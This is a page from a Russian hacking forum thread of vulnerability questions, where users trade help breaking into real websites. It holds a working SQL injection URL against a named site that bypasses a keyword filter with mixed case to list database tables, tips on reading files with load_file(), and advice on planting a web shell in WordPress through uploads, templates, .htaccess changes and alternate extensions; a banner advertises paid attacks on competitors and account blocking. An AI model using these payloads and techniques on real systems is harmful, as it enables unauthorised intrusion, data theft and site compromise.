Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 112 из 296

112

Опции темы

Поиск в этой теме

Опции просмотра

#1111

07.02.2016, 14:16

winstrool

Познающий

Регистрация: 06.03.2007

Сообщений: 59

С нами: 10095779

Репутация: 137

Цитата:

Сообщение от Улыбайся

↑
тогда когда какой вариант? создать пользователя который сможет? CREATE USER

Как вариант попробывать вот эту тему:

https://rdot.org/forum/showthread.php?t=741

но это только лишь читалка...

P.S: Читалку тестировали? load_file()

#1112

07.02.2016, 14:18

ArmusIAm

Познающий

Регистрация: 08.01.2016

Сообщений: 33

С нами: 5445686

Репутация: 0

http://www.enec.ru/Index.phtml?Name=...ct+1,2,3,4,5--

Хостер фильтрует "from", чем можно заменить или обойти фильтр?

#1113

07.02.2016, 18:29

private_static

Участник форума

Регистрация: 19.05.2015

Сообщений: 117

С нами: 5782646

Репутация: 22

Цитата:

Сообщение от ArmusIAm

↑
http://www.enec.ru/Index.phtml?Name=...ct+1,2,3,4,5--
Хостер фильтрует "from", чем можно заменить или обойти фильтр?

Код:

http://www.enec.ru/Index.phtml?Name=News&newsID=-40+union+select+1,2,TABLE_NAME,4,5+fRoM+information_schema.tables

#1114

07.02.2016, 18:49

Улыбайся

Познающий

Регистрация: 23.10.2011

Сообщений: 71

С нами: 7660406

Репутация: 3

Цитата:

Сообщение от winstrool

↑
Как вариант попробывать вот эту тему:
https://rdot.org/forum/showthread.php?t=741
но это только лишь читалка...
P.S: Читалку тестировали?
load_file()

ок гляну.

#1115

07.02.2016, 21:51

Br@!ns

Постоянный

Регистрация: 03.09.2010

Сообщений: 885

С нами: 8258006

Репутация: 25

какие варианы залития шелла в вордпресс при штаке на папку /uploads ? все читается как текстовые файлы

#1116

08.02.2016, 01:51

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

С нами: 8885780

Репутация: 672

Цитата:

Сообщение от Br@!ns

↑
какие варианы залития шелла в вордпресс при штаке на папку /uploads ? все читается как текстовые файлы

темплейты, плагины..

#1117

08.02.2016, 12:37

Br@!ns

Постоянный

Регистрация: 03.09.2010

Сообщений: 885

С нами: 8258006

Репутация: 25

Цитата:

Сообщение от Konqi

↑
темплейты, плагины..

-

само собой там тоже без прав)

#1118

08.02.2016, 12:38

OxoTnik

Постоянный

Регистрация: 10.06.2011

Сообщений: 939

С нами: 7854806

Репутация: 173

Цитата:

Сообщение от Br@!ns

↑
-
само собой там тоже без прав)

Правка .htaccess ?

Установка нового .htaccess в твою папку со своими привилегиями

#1119

08.02.2016, 12:43

Saint-Sky

Участник форума

Регистрация: 14.07.2007

Сообщений: 108

С нами: 9909614

Репутация: 305

Цитата:

Сообщение от Br@!ns

↑
какие варианы залития шелла в вордпресс при штаке на папку /uploads ? все читается как текстовые файлы

Все расширения пробовал?

А то я встречал такие .хтаксес, что все виды .php - читались как текст, а вот .phtml прокатывал...

#1120

08.02.2016, 13:07

Br@!ns

Постоянный

Регистрация: 03.09.2010

Сообщений: 885

С нами: 8258006

Репутация: 25

Цитата:

Сообщение от OxoTnik

↑
Правка .htaccess ?
Установка нового .htaccess в твою папку со своими привилегиями

штака сохраняется как /htaccess, т.е без точки, т.е не работает (гружу через добавление темы)

с расширениями тоже чего то не хочет. shtml шелл так же ничего не показывает